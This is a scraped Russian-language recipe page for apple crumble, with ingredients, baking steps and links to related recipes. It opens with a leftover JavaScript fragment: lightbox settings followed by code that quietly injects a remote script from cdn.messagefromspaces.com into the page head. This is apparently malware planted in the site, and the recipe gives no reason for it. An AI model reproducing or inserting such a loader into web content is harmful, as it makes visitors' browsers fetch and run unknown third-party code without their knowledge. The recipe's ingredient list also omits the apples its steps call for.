, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Яблочный крамбл


Яблочный крамблКрамбл — это очень вкусный английский классический десерт: фрукты, посыпанные крошкой и запеченные в духовке. Готовить его можно из любых фруктов, но лучше всего он получается  из яблок. 

ЧЕГО И СКОЛЬКО БЕРЕМ:

1. Сливочное масло — 100 гр.

2. Сахар — 1/4 стакана

3. Мука — 3/4 стакана

4. Овсяные хлопья — 1/2 стакана

5. Грецкие орехи — 100 гр.

НАЧИНАЕМ ГОТОВИТЬ:

1. Измельчить в блендере орехи до средней фракции, не нужно делать ореховую муку))

2. Из масла, сахара, орехов, овсяных хлопьев готовим крошку: просто мелко рубим все ножом и хорошенько перемешиваем. Крошка НЕ должна быть очень мелкой!

3. Яблоки очистить от кожуры и нарезать дольками, при желании добавить изюм или любые сухофрукты. Яблоки можно слегка припустить в коньяке (как вариант)

4. Выложить яблоки на дно формы и посыпать сверху крошкой

5. Поставить в духовку 200 градусов на 25-30 минуток

 

На эту тему вы можете почитать:

Конфетки из сухофруктов
Варенье из слив с апельсинчиком
Запеканка диетическая

Тэги: , ,



Добавить комментарий